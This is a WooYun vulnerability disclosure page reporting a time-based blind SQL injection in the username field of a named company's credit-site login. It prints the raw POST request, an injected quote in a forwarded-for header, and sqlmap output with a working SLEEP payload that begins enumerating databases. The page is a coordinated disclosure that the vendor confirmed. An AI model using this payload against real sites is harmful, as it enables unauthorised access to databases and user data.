当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118118

漏洞标题:浙江爱客仕某站SQL注入二

相关厂商:xkeshi.com

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-06-04 10:35

修复时间:2015-07-20 16:30

公开时间:2015-07-20 16:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-04: 细节已通知厂商并且等待厂商处理中
2015-06-05: 厂商已经确认,细节仅向厂商公开
2015-06-15: 细节向核心白帽子及相关领域专家公开
2015-06-25: 细节向普通白帽子公开
2015-07-05: 细节向实习白帽子公开
2015-07-20: 细节向公众公开

简要描述:

【HD】 以团队之名 以个人之荣耀 共建网络安全

详细说明:

注入点二:http://credit.xkeshi.com/user/login;jsessionid=1wwfhwvdrff50v32yk1wdjd3b
参数 username 未过滤 导致了本次注入
POST数据包:

POST /user/login HTTP/1.1
Host: credit.xkeshi.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://credit.xkeshi.com/user/login;jsessionid=1wwfhwvdrff50v32yk1wdjd3b
Cookie: Hm_lvt_e31fc7871d44b542d1441f0ac128e773=1433342223; Hm_lpvt_e31fc7871d44b542d1441f0ac128e773=1433342271; JSESSIONID=1uqib0bochj2tyz9aatxw7w17; Hm_lvt_0ebd3318f96e1f5b8259fc3cdc476d5a=1433342237; Hm_lpvt_0ebd3318f96e1f5b8259fc3cdc476d5a=1433342867
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
username=admin&password=admin


00.png


POST parameter 'username' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 113 HTTP(s) req
uests:
---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: username=admin') AND (SELECT * FROM (SELECT(SLEEP(5)))zgPQ) AND ('l
DWM'='lDWM&password=admin
---
[22:55:02] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0.12
[22:55:02] [INFO] fetching database names
[22:55:02] [INFO] fetching number of databases
[22:55:02] [INFO] retrieved:
[22:55:02] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
1
[22:55:21] [INFO] adjusting time delay to 1 second due to good response times
7
[22:55:22] [INFO] retrieved: information_


因为断网跟时间的关系 数据库就没继续跑了 但是跟上一个漏洞的数据库是一样的 都是17个数据库 所以····你懂得( WooYun: 浙江爱客仕某站SQL注入

漏洞证明:

修复方案:

话说 厂商会送小礼物不?

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-06-05 16:29

厂商回复:

感谢关注,已安排人员做修复处理。

最新状态:

暂无

漏洞评价:

评论